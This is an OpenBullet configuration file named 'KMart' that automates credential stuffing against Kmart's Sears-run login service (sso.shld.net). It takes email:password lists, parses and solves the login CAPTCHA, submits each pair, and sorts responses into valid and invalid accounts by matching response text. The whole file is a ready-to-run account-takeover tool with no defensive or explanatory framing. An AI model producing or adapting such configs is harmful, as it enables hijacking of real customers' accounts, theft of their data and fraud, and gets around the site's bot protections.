[SETTINGS]
{
  "Name": "KMart",
  "SuggestedBots": 10,
  "LastModified": "2018-05-15T19:09:53.3670262+00:00",
  "AdditionalInfo": "",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_MAIN_PAGE REQUEST GET "https://www.kmart.com/universalprofile/userLogonForm?upid=4&formName=LOGIN&URL=http%3A%2F%2Fwww.kmart.com%2F" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
#USERSTATE REQUEST POST "https://sso.shld.net/shccas/usr/userstate.htm" AutoRedirect=TRUE 
  CONTENT "email=<USER>&sid=4" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "referer: https://sso.shld.net/shccas/usr/loginform.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&service=http%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&fid=28FE3EF1A8240E9F-1C1B729BF2FD874F&sywrequired=true&modifyservice=true&fullpage=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default5804&xdm_p=1" 
  HEADER "origin: https://sso.shld.net" 
#VALIDATE REQUEST POST "https://sso.shld.net/shccas/usr/validate.htm" AutoRedirect=TRUE 
  CONTENT "email=<USER>&sid=4" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "referer: https://sso.shld.net/shccas/usr/loginform.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&service=http%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&fid=28FE3EF1A8240E9F-1C1B729BF2FD874F&sywrequired=true&modifyservice=true&fullpage=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default5804&xdm_p=1" 
  HEADER "origin: https://sso.shld.net" 
#PARSE_CAPTCHA_URL PARSE "<SOURCE>" CSS "img" "src" 0 -> VAR "CAPURL" "" "" 
#PARSE_SHC_DATA_FIELD PARSE "<SOURCE>" CSS "#shc_data_field" "value" 0 -> VAR "SHC" "" "" 
CAPTCHA "<CAPURL>" Base64=FALSE SendScreenshot=FALSE -> VAR "CAPTCHA" 
#LOGIN REQUEST POST "https://sso.shld.net/shccas/usr/loginhandler.htm" AutoRedirect=TRUE 
  CONTENT "loginId=<USER>&logonPassword=<PASS>&sourceSiteId=4&service=https%3A%2F%2Fwww.kmart.com%2FUSRLogon%3FstoreId%3D10151%26catalogId%3D10104%26langId%3D-1&redirectUrl=http%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&modifyservice=true&sywLogin=true&shcKey=<SHC>&shcResponse=<CAPTCHA>&tncmodal=false&clienthost=www.kmart.com&renew=true&sywmax=&irp=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "X-Requested-With: XMLHttpRequest" 
  HEADER "referer: https://sso.shld.net/shccas/usr/loginform.htm?_flowId=regEnroll-flow&clienthost=www.kmart.com&service=http%3A%2F%2Fwww.kmart.com%2F%3FstoreId%3D10151%26catalogId%3D10104&sid=4&fid=28FE3EF1A8240E9F-1C1B729BF2FD874F&sywrequired=true&modifyservice=true&fullpage=true&irp=true&xdm_e=https%3A%2F%2Fwww.kmart.com&xdm_c=default5804&xdm_p=1" 
  HEADER "origin: https://sso.shld.net" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "Sorry, your credentials have expired." 
    KEY "Sorry, we didn't recognize that email and password combination" 
  KEYCHAIN Success OR 
    KEY "nonWCSStoreValue" 
